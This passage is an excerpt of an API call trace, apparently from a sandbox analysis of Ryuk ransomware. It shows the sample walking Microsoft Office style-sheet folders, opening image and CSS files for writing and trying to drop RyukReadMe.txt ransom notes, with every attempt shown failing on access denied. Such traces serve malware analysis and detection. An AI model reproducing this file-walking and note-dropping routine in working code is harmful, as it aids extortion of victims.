returned 1 [0136.103] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.103] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.103] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightOrange\\background.gif", dwFileAttributes=0x80) returned 0 [0136.103] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightOrange\\background.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\brightorange\\background.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.103] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.104] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.104] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.104] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.104] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightOrange\\BUTTON.GIF", dwFileAttributes=0x80) returned 0 [0136.104] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightOrange\\BUTTON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\brightorange\\button.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.104] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.104] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.104] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.104] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.104] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightOrange\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0136.104] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightOrange\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\brightorange\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.105] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.105] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.105] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.105] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.105] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightOrange\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0136.106] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightOrange\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\brightorange\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.106] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.106] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.106] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0136.106] FindClose (in: hFindFile=0x3b4940 | out: hFindFile=0x3b4940) returned 1 [0136.106] SetLastError (dwErrCode=0x0) [0136.106] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightOrange\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\brightorange\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.106] GetLastError () returned 0x5 [0136.106] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.106] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.106] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.106] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.106] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightOrange.css", dwFileAttributes=0x80) returned 0 [0136.107] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightOrange.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\brightorange.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.107] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.107] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.107] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.107] SetLastError (dwErrCode=0x0) [0136.107] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.107] GetLastError () returned 0x5 [0136.107] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.107] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.107] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightYellow\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3b4940 [0136.107] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.107] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.107] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.108] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightYellow\\HEADER.GIF", dwFileAttributes=0x80) returned 0 [0136.108] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightYellow\\HEADER.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\brightyellow\\header.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.108] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.108] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.108] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.108] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.108] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightYellow\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0136.108] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightYellow\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\brightyellow\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.108] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.108] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.109] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.109] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.109] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightYellow\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0136.110] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightYellow\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\brightyellow\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.110] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.110] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.110] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0136.110] FindClose (in: hFindFile=0x3b4940 | out: hFindFile=0x3b4940) returned 1 [0136.110] SetLastError (dwErrCode=0x0) [0136.110] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightYellow\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\brightyellow\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.110] GetLastError () returned 0x5 [0136.110] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.110] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.110] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.110] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.111] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightYellow.css", dwFileAttributes=0x80) returned 0 [0136.111] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightYellow.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\brightyellow.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.111] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.111] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.111] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.111] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.111] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Casual.css", dwFileAttributes=0x80) returned 0 [0136.111] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Casual.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\casual.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.111] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.112] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.112] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.112] SetLastError (dwErrCode=0x0) [0136.112] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.112] GetLastError () returned 0x5 [0136.112] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.112] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.112] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Desert\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3b4940 [0136.112] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.112] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.112] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.112] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Desert\\HEADER.GIF", dwFileAttributes=0x80) returned 0 [0136.112] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Desert\\HEADER.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\desert\\header.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.113] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.113] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.113] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.113] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.113] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Desert\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0136.113] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Desert\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\desert\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.113] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.113] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.113] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.113] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.114] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Desert\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0136.114] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Desert\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\desert\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.114] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.114] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.114] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0136.114] FindClose (in: hFindFile=0x3b4940 | out: hFindFile=0x3b4940) returned 1 [0136.115] SetLastError (dwErrCode=0x0) [0136.115] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Desert\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\desert\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.115] GetLastError () returned 0x5 [0136.115] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.115] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.115] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.115] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.115] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Desert.css", dwFileAttributes=0x80) returned 0 [0136.115] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Desert.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\desert.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.115] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.115] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.115] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.115] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.116] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Discussion.css", dwFileAttributes=0x80) returned 0 [0136.116] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Discussion.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\discussion.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.116] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.116] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.116] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.116] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.116] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Earthy.css", dwFileAttributes=0x80) returned 0 [0136.116] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Earthy.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\earthy.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.116] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.117] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.117] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.117] SetLastError (dwErrCode=0x0) [0136.117] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.117] GetLastError () returned 0x5 [0136.117] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.117] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.117] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\GrayCheck\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3b4940 [0136.117] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.117] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.117] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.117] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\GrayCheck\\HEADER.GIF", dwFileAttributes=0x80) returned 0 [0136.117] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\GrayCheck\\HEADER.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\graycheck\\header.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.117] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.118] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.118] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.118] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.118] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\GrayCheck\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0136.118] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\GrayCheck\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\graycheck\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.118] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.118] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.118] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.118] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.118] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\GrayCheck\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0136.119] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\GrayCheck\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\graycheck\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.119] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.119] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.119] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0136.119] FindClose (in: hFindFile=0x3b4940 | out: hFindFile=0x3b4940) returned 1 [0136.119] SetLastError (dwErrCode=0x0) [0136.119] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\GrayCheck\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\graycheck\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.120] GetLastError () returned 0x5 [0136.120] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.120] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.120] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.120] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.120] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\GrayCheck.css", dwFileAttributes=0x80) returned 0 [0136.120] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 